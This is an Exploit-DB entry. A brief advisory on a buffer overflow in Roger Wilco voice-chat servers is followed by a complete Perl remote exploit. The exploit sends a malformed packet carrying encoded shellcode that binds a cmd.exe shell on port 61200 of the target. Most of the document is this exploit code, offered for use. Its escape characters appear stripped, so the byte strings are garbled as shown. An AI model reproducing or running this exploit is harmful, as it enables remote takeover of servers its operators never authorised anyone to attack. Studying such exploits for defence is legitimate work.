https://www.exploit-db.com/exploits/23123

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8566/info

A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side, and can be triggered when processing malformed client packets. Specifically, when connecting to a server the Roger Wilco client transmits a packet containing the size of data to be copied into an internal buffer. As a result, a malicious user could modify the size to result in excessive data being copied into a previously allocated buffer. This could ultimately allow for sensitive server memory to be corrupted, potentially resulting in the execution of arbitrary code.

#!/usr/bin/perl
#
#       RogerWilco v1.4.1.6 remote buffer overflow exploit
#  ...just for fun
#
# Binds cmd.exe shell on port 61200.
# Retaddr 0x0122fa44 will works only if roger.exe has md5
# checksum 89f2d9cda1abc1f55cd06181fbdd6e43 (v.1.4.1.6).
# And there is no metter what win32 operation system installed
# (winnxp/2k/nt/me/9x/03).
# Btw, RogerWilco is a kewl Internet Voice chat for gamers (hm).
# Vendor: rogerwilco.gamespy.com.
# Bug founded by Auriemma Luigi (hey dude in da third time ;])
# Advisory: security.nnov.ru/search/document.asp?docid=5074
#
# Greets to all ppl from #m00sec #nerf and #priv8security (EFnet)
#
# d4rkgr3y [[email protected]] // m00 [www.m00.ru]
#

use IO::Socket;
$host = "127.0.0.1";
$port = "3782";
$retaddr = "x44xfax22x01";

$shellcode =
	"x33xff". #xor edi,edi
	"x33xf6". #xor esi,esi
	"x33xdb". #xor ebx,ebx
	"xB8x01xF0x22x01". #mov eax,122F020
	#"xcc". #int3
	"x83xC0x15x33xC9x66xB9xD1x01x80x30x96x40xE2xFA". #decryptor
	#winxp/2k xored portbind shellcode
	"x15x7AxA2x1Dx62x7ExD1x97x96x96x1Fx90x69xA0xFEx18xD8x98x7Ax7ExF7".
	"x97x96x96x1FxD0x9Ex69xA0xFEx3Bx4Fx93x58x7ExC4x97x96x96x1FxD0".
	"x9AxFExFAxFAx96x96xFExA5xA4xB8xF2xFExE1xE5xA4xC9xC2x69xC0x9E".
	"x1FxD0x92x69xA0xFExE4x68x25x80x7ExBBx97x96x96x1FxD0x86x69xA0".
	"xFExE8x4Ex74xE5x7Ex88x97x96x96x1FxD0x82x69xE0x92xFEx5Dx7Bx6A".
	"xADx7Ex98x97x96x96x1FxD0x8Ex69xE0x92xFEx4Fx9Fx63x3Bx7Ex68x96".
	"x96x96x1FxD0x8Ax69xE0x92xFEx32x8CxE6x51x7Ex78x96x96x96x1FxD0".
	"xB6x69xE0x92xFEx32x3BxB8x7Fx7Ex48x96x96x96x1FxD0xB2x69xE0x92".
	"xFEx73xDFx10xDFx7Ex58x96x96x96x1FxD0xBEx69xE0x92xFEx71xEFx50".
	"xEFx7Ex28x96x96x96x1FxD0xBAxA5x69x17x7Ax06x97x96x96xC2xFEx97".
	"x97x96x96x69xC0x8ExC6xC6xC6xC6xD6xC6xD6xC6x69xC0x8Ax1Dx4ExC1".
	"xC1xFEx94x96x79x86x1Dx5AxFCx80xC7xC5x69xC0xB6xC1xC5x69xC0xB2".
	"xC1xC7xC5x69xC0xBEx1Dx46xFExF3xEExF3x96xFExF5xFBxF2xB8x1FxF0".
	"xA6x15x7AxC2x1BxAAxB2xA5x56xA5x5Fx15x57x83x3Dx74x6Bx50xD2xB2".
	"x86xD2x68xD2xB2xABx1FxC2xB2xDEx1FxC2xB2xDAx1FxC2xB2xC6x1BxD2".
	"xB2x86xC2xC6xC7xC7xC7xFCx97xC7xC7x69xE0xA6xC7x69xC0x86x1Dx5A".
	"xFCx69x69xA7x69xC0x9Ax1Dx5ExC1x69xC0xBAx69xC0x82xC3xC0xF2x37".
	"xA6x96x96x96x13x56xEEx9Ax1DxD6x9Ax1DxE6x8Ax3Bx1DxFEx9Ex7Dx9F".
	"x1DxD6xA2x1Dx3Ex2Ex96x96x96x1Dx53xC8xCBx54x92x96xC5xC3xC0xC1".
	"x1DxFAxB2x8Ex1DxD3xAAx1DxC2x93xEEx95x43x1DxDCx8Ex1DxCCxB6x95".
	"x4Bx75xA4xDFx1DxA2x1Dx95x63xA5x69x6AxA5x56x3AxACx52xE2x91x57".
	"x59x9Bx95x6Ex7Dx64xADxEAxB2x82xE3x77x1DxCCxB2x95x4BxF0x1Dx9A".
	"xDDx1DxCCx8Ax95x4Bx1Dx92x1Dx95x53x7Dx94xA5x56x1Dx43xC9xC8xCB".
	"xCDx54x92x96";


for($i=0;$i<1263-200-490;$i++) {
	$execode .= "x90";
}

$execode .= "$shellcode";

for($i=0;$i<200;$i++) {
	$execode .= "x90";
}
print "nrRogerWilco v1.4.1.6 remote buffer overflow exploitnn=> Connecting to $host:$port.. ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die " damnn";
print "okn=> Sending exploit buffer... ";
$buf =
	"x0Fx00x05x08x6AxD6x4Cx03".
	"x96xEDx3BxE7x88xE2xA9x74".
	"channel".
	"x00".
	"$execode".
	"$retaddr".
	"x0Fx10x00x04".
	"d4rk".
	"x0Fx11x00x04x00x00x00x02".
	"x0Fx12x00x04x00x00x00x00";

print $socket "$buf";
print "okn=> Exiting... nn";
sleep(2);

close($socket);